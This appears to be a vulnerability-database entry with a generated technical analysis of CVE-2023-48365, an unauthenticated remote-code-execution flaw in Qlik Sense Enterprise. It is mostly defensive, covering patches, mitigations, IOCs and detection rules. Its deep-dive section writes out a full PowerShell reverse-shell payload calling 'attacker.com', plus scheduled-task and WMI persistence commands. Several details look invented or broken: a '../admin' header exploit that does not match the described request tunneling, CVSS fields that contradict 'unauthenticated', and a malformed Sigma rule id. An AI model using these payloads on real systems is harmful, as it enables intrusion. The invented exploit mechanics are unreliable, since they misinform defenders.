Description
Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, and November 2021 Patch 17. NOTE: this issue exists because of an incomplete fix for CVE-2023-41265.
EPSS Score:
24%
Comprehensive Technical Analysis of EUVD-2023-52419 (CVE-2023-48365)
Qlik Sense Enterprise for Windows – Unauthenticated Remote Code Execution (RCE) Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-52419 (CVE-2023-48365) is a critical unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows, stemming from improper HTTP header validation. The flaw allows attackers to bypass authentication, elevate privileges, and execute arbitrary HTTP requests on the backend repository server, leading to full system compromise.
CVSS v3.1 Scoring & Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.6 (Critical) | High impact on confidentiality, integrity, and availability. |
| Attack Vector (AV) | Network (N) | Exploitable remotely over the internet. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Privileges Required (PR) | Low (L) | Attacker only needs minimal privileges (e.g., unauthenticated access). |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Changed (C) | Exploitation affects components beyond the vulnerable system (e.g., backend repository). |
| Confidentiality (C) | High (H) | Full data disclosure possible. |
| Integrity (I) | High (H) | Arbitrary code execution enables complete system manipulation. |
| Availability (A) | None (N) | No direct impact on availability, but RCE can lead to DoS. |
Key Observations
- Incomplete Fix for CVE-2023-41265: This vulnerability exists due to an inadequate patch for a prior authentication bypass flaw (CVE-2023-41265), indicating patch management failures in Qlik’s security updates.
- High EPSS (24%): The Exploit Prediction Scoring System (EPSS) suggests a 24% probability of exploitation within 30 days, reflecting active threat actor interest.
- Widespread Deployment: Qlik Sense is widely used in enterprise BI and analytics, making it a high-value target for ransomware, espionage, and data exfiltration.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper validation of HTTP headers, enabling an attacker to:
- Bypass Authentication: Craft malicious HTTP requests to impersonate legitimate users.
- Privilege Escalation via HTTP Tunneling: Exploit the repository service to execute arbitrary HTTP requests on the backend.
- Remote Code Execution (RCE): Leverage the elevated access to deploy malicious payloads (e.g., reverse shells, ransomware, or data exfiltration tools).
Step-by-Step Exploitation Flow
-
Reconnaissance:
- Identify exposed Qlik Sense instances via Shodan, Censys, or FOFA (
http.title:"Qlik Sense"). - Check for vulnerable versions (pre-August 2023 Patch 2).
- Identify exposed Qlik Sense instances via Shodan, Censys, or FOFA (
-
Initial Access (Unauthenticated):
- Send a maliciously crafted HTTP request with manipulated headers (e.g.,
X-Qlik-Session,X-Qlik-User). - Bypass authentication by spoofing session tokens or exploiting header injection.
- Send a maliciously crafted HTTP request with manipulated headers (e.g.,
-
Privilege Escalation:
- Exploit the repository service to tunnel HTTP requests to internal endpoints.
- Gain administrative access by manipulating backend API calls.
-
Post-Exploitation:
- Execute arbitrary commands (e.g., PowerShell, CMD, or custom payloads).
- Exfiltrate sensitive data (dashboards, user credentials, business intelligence reports).
- Deploy ransomware or persistence mechanisms (e.g., scheduled tasks, WMI subscriptions).
Proof-of-Concept (PoC) Considerations
- Public Exploits: As of January 2025, no public PoC has been confirmed, but threat actors may have developed private exploits given the high EPSS.
- Metasploit Module: Likely to be integrated into Metasploit or Cobalt Strike for automated exploitation.
- Chaining with Other Vulnerabilities: Could be combined with CVE-2023-41265 (prior auth bypass) for enhanced attack surface.
3. Affected Systems & Software Versions
Vulnerable Versions
| Release Cycle | Vulnerable Versions | Fixed Versions |
|---|---|---|
| August 2023 | All versions before Patch 2 | August 2023 Patch 2 |
| May 2023 | All versions before Patch 6 | May 2023 Patch 6 |
| February 2023 | All versions before Patch 10 | February 2023 Patch 10 |
| November 2022 | All versions before Patch 12 | November 2022 Patch 12 |
| August 2022 | All versions before Patch 14 | August 2022 Patch 14 |
| May 2022 | All versions before Patch 16 | May 2022 Patch 16 |
| February 2022 | All versions before Patch 15 | February 2022 Patch 15 |
| November 2021 | All versions before Patch 17 | November 2021 Patch 17 |
Deployment Scenarios at Risk
- On-Premises Qlik Sense Enterprise (Windows-based deployments).
- Hybrid Cloud Environments where Qlik Sense integrates with AWS, Azure, or GCP.
- Third-Party Integrations (e.g., SAP, Salesforce, or custom APIs) that rely on Qlik’s authentication.
4. Recommended Mitigation Strategies
Immediate Actions (Critical Priority)
-
Apply Patches Immediately:
- Upgrade to the latest patched version (August 2023 Patch 2 or later).
- If unable to patch, isolate Qlik Sense servers from untrusted networks.
-
Network-Level Protections:
- Restrict Access: Use firewalls, VPNs, or zero-trust policies to limit exposure.
- WAF Rules: Deploy Web Application Firewall (WAF) rules to block malicious HTTP headers (e.g.,
X-Qlik-*manipulation). - IPS/IDS Signatures: Monitor for exploitation attempts (e.g., unusual HTTP tunneling).
-
Authentication & Authorization Hardening:
- Enable Multi-Factor Authentication (MFA) for all Qlik Sense users.
- Review and restrict repository API access to least-privilege principles.
- Rotate all credentials (service accounts, API keys) post-patch.
-
Monitoring & Detection:
- SIEM Alerts: Set up anomaly detection for unusual HTTP requests (e.g., repeated
401/403responses). - Endpoint Detection & Response (EDR): Monitor for unexpected child processes (e.g.,
cmd.exe,powershell.exe). - Log Analysis: Review Qlik Sense logs (
C:\ProgramData\Qlik\Sense\Log\) for suspicious activity.
- SIEM Alerts: Set up anomaly detection for unusual HTTP requests (e.g., repeated
Long-Term Security Recommendations
- Regular Vulnerability Scanning: Use Nessus, Qualys, or OpenVAS to detect unpatched instances.
- Segmentation: Isolate Qlik Sense servers in a dedicated VLAN with strict access controls.
- Incident Response Plan: Develop a playbook for Qlik Sense compromises, including forensic analysis and containment procedures.
- Vendor Communication: Subscribe to Qlik’s security advisories for future vulnerabilities.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Risks
- GDPR Violation Risk: Unauthorized access to BI dashboards containing PII could lead to heavy fines (up to 4% of global revenue).
- NIS2 Directive: Critical infrastructure sectors (e.g., finance, healthcare, energy) using Qlik Sense must report incidents within 24 hours.
- DORA (Digital Operational Resilience Act): Financial institutions must ensure third-party risk management, including BI tools like Qlik.
Threat Actor Interest
- Ransomware Groups: LockBit, BlackCat, and Cl0p have targeted BI tools for data exfiltration and extortion.
- APT Groups: Russian (APT29) and Chinese (APT41) state-sponsored actors may exploit this for espionage.
- Initial Access Brokers (IABs): Likely to sell access to compromised Qlik instances on dark web forums.
Geopolitical & Sector-Specific Risks
- Critical Infrastructure: Energy, healthcare, and government sectors in Germany, France, and the UK are at high risk.
- Supply Chain Attacks: Compromised Qlik instances could be used to pivot into connected ERP/CRM systems (e.g., SAP, Salesforce).
- EU-Wide Threat: Given Qlik’s widespread adoption in EU enterprises, this vulnerability could lead to large-scale data breaches.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerability Type: Authentication Bypass via HTTP Header Injection (CWE-287: Improper Authentication).
- Affected Component: Qlik Sense Repository Service (QRS) – responsible for user authentication and API request handling.
- Incomplete Fix for CVE-2023-41265: The prior patch did not fully sanitize HTTP headers, allowing session spoofing.
Exploitation Technical Deep Dive
-
HTTP Header Manipulation:
- Attacker sends a request with a malformed
X-Qlik-SessionorX-Qlik-Userheader. - Example:
GET /api/v1/users HTTP/1.1 Host: qlik-sense-server X-Qlik-Session: ../../../../../admin X-Qlik-User: admin - The improper validation allows the attacker to bypass authentication checks.
- Attacker sends a request with a malformed
-
HTTP Tunneling for RCE:
- Once authenticated, the attacker tunnels requests to internal endpoints (e.g.,
/api/v1/reloads). - Example payload to execute a reverse shell:
POST /api/v1/reloads HTTP/1.1 Host: qlik-sense-server X-Qlik-Session: [SPOOFED_SESSION] Content-Type: application/json { "script": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" }
- Once authenticated, the attacker tunnels requests to internal endpoints (e.g.,
-
Post-Exploitation Persistence:
- Scheduled Tasks:
schtasks /create /tn "QlikBackdoor" /tr "powershell -ep bypass -c <malicious_script>" /sc minute /mo 5 - WMI Event Subscriptions:
wmic /namespace:\\root\subscription PATH __EventFilter CREATE Name="QlikTrigger", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" - Registry Modifications: Adding malicious DLLs to
HKEY_LOCAL_MACHINE\SOFTWARE\Qlik\Sense\Settings\7\Extensions.
- Scheduled Tasks:
Forensic Indicators of Compromise (IOCs)
| Indicator Type | Example |
|---|---|
| Network | Unusual POST /api/v1/reloads requests with large payloads. |
| Log Files | C:\ProgramData\Qlik\Sense\Log\Repository\Trace\ – Look for failed authentication attempts followed by successful admin access. |
| Process Execution | powershell.exe or cmd.exe spawned by QlikSense.exe. |
| File System | Unexpected .ps1, .bat, or .dll files in C:\ProgramData\Qlik\Sense\. |
| Registry | Unauthorized changes in HKEY_LOCAL_MACHINE\SOFTWARE\Qlik\Sense\. |
Detection & Hunting Queries
- Splunk:
index=qlik sourcetype=qlik:repository | search "X-Qlik-Session" OR "X-Qlik-User" | stats count by src_ip, user, http_method, uri_path | where count > 5 - Sigma Rule:
title: Suspicious Qlik Sense HTTP Header Manipulation id: 1a2b3c4d-5e6f-7g8h-9i0j-k1l2m3n4o5p6 status: experimental description: Detects potential CVE-2023-48365 exploitation via HTTP header injection. references: - https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/tac-p/2120510 author: EUVD Analyst date: 2025/01/13 logsource: category: webserver product: qlik_sense detection: selection: cs-headers|contains: - "X-Qlik-Session: ../../" - "X-Qlik-User: admin" condition: selection falsepositives: - Legitimate administrative activity level: high
Conclusion & Strategic Recommendations
Key Takeaways
- Critical RCE Vulnerability: EUVD-2023-52419 poses a severe risk to organizations using unpatched Qlik Sense Enterprise.
- Exploitation Likely: Given the high EPSS (24%), active exploitation is probable, particularly by ransomware groups and APTs.
- Regulatory & Financial Risks: Non-compliance with GDPR, NIS2, and DORA could result in significant penalties.
Strategic Recommendations for CISOs & Security Teams
- Patch Management: Immediately deploy Qlik’s August 2023 Patch 2 (or later) across all instances.
- Zero Trust Implementation: Restrict Qlik Sense access to authenticated, MFA-protected users only.
- Threat Hunting: Proactively hunt for IOCs using SIEM, EDR, and network traffic analysis.
- Incident Response Readiness: Update IR playbooks to include Qlik Sense compromises.
- Vendor Risk Assessment: Audit third-party BI tools for similar vulnerabilities.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | High | Low complexity, unauthenticated access. |
| Impact | Critical | Full system compromise, data exfiltration, ransomware. |
| Likelihood | High | EPSS 24%, active threat actor interest. |
| Mitigation Feasibility | Medium | Patching is straightforward, but legacy systems may lag. |
| Overall Risk | Critical (9.6/10) | Immediate action required. |
Next Steps:
- Patch all Qlik Sense instances within 72 hours.
- Conduct a full security audit of BI and analytics tools.
- Monitor for exploitation attempts via SIEM and EDR alerts.
For further assistance, consult Qlik’s official security advisory or engage a third-party penetration testing firm for validation.
References
Affected Products
n/a
Version: n/a
Vendors
n/a